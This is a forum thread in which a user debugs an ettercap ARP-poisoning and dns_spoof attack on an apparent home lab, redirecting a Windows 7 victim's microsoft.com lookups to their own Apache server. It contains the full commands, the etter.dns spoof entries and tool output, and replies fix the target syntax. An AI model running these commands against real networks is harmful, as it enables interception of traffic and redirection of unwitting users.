Jump to content

[ettercap]dns_spoof problem


pierre

Recommended Posts

hello,

I try to use the plugin dns_spoof on a victim machine.

However, an errors appears ...

root@osboxes:~# ettercap –i eth0 –T –q –P dns_spoof -M ARP /192.168.0.2.//
ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team
TARGET (–i) contains invalid chars !

The parameter " -i " requires an interface value so what's wrong ??

PS : I can do the classic MITM with the graphical interface.

Link to comment
Share on other sites

The command works with

ettercap -T -q -i eth0 -P dns_spoof -M arp //192.168.0.2//

Here is how I've done :

I try to redirect a victim to my own apache web server when he is on a particular URL.
First I have a look at etter.dns :

root@osboxes:~# vim /etc/ettercap/etter.dns
# microsoft sucks ;)
# redirect it to www.linux.org
#
microsoft.com A 192.168.0.1
*.microsoft.com A 192.168.0.1
www.microsoft.com PTR 192.168.0.1 # Wildcards in PTR are not allowed

So the victim be spoof by going on microsoft.com
I can ping my victim :

root@osboxes:~# ifconfig eth0 192.168.0.1/24
root@osboxes:~# ping 192.168.0.2
PING 192.168.0.2 (192.168.0.2) 56(84) bytes of data.
64 bytes from 192.168.0.2: icmp_seq=1 ttl=128 time=0.808 ms
64 bytes from 192.168.0.2: icmp_seq=2 ttl=128 time=0.639 ms
^C
--- 192.168.0.2 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1000ms
rtt min/avg/max/mdev = 0.639/0.723/0.808/0.088 ms

I active webserver :

root@osboxes:~# service apache2 start

So now I enter this command :

ettercap -T -q -i eth0 -P dns_spoof -M arp //192.168.0.2//


ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team

Listening on:
eth0 -> 08:00:27:1D:EC:A2
192.168.0.1/255.255.255.0
fe80::a00:27ff:fe1d:eca2/64

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Ettercap might not work correctly. /proc/sys/net/ipv6/conf/eth0/use_tempaddr is not set to 0.
Privileges dropped to EUID 65534 EGID 65534...

33 plugins
42 protocol dissectors
57 ports monitored
20388 mac vendor fingerprint
1766 tcp OS fingerprint
2182 known services
Lua: no scripts were specified, not starting up!

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

Scanning for merged targets (1 hosts)...

* |==================================================>| 100.00 %

3 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : 192.168.0.2 08:00:27:3B:98:9D

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

Activating dns_spoof plugin...

But unfortunately, victim can access to microsoft.com , nothing is spoof...
PS : My victim have access to my webserver by hitting @IP in URL of it browser

Link to comment
Share on other sites

You went from

/192.168.0.2.//

to

//192.168.0.2//

I believe the extra slash at the beginning is causing ettercap to misinterpret your intentions.

You might want to consider not including the -q (quiet) parameter until things do work.

Link to comment
Share on other sites

it still does not works...

Here is my /etc/ettercap/etter.dns configuration :

microsoft.com A 192.168.0.1
*.microsoft.com A 192.168.0.1
www.microsoft.com PTR 192.168.0.1 # Wildcards in PTR are not allow
ed

I've done this :

root@osboxes:~# ettercap -T -i eth0 -P dns_spoof -M arp /192.168.0.2.//

Thu Dec 24 06:04:37 2015 [797997]
UDP 192.168.0.2:137 --> 192.168.0.255:137 | (50)
............ FHFAEBEECACACACACACACACACACACAAA.. ..

Thu Dec 24 06:04:38 2015 [358326]
UDP 192.168.0.2:137 --> 192.168.0.255:137 | (50)
............ FHFAEBEECACACACACACACACACACACAAA.. ..

Thu Dec 24 06:04:38 2015 [547962]
UDP 192.168.0.2:137 --> 192.168.0.255:137 | (50)
............ FHFAEBEECACACACACACACACACACACAAA.. ..

[same logs..]

But my W7 computer (I turned off all firewall) isn't redirected to my own apache server.

When I hit 192.168.0.1 in URL, W7 comes to my Apache server...

What's wrongggg ?

Link to comment
Share on other sites

Port 137 is NetBIOS so I don't understand what that has to do with DNS.

You're supposed to provide IP addresses, so I'm thinking the dot at the end of the .2 address is wrong, though I believe that if ettercap encounters such a thing and has issues with it, it should complain about it. Anyways, I would start with removing that dot.

Look at the traffic on the network with Wireshark. Verify that the ARP packets are sent by your machine to the target to tell it it should use your machine for something rather than whatever it's configured to use.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...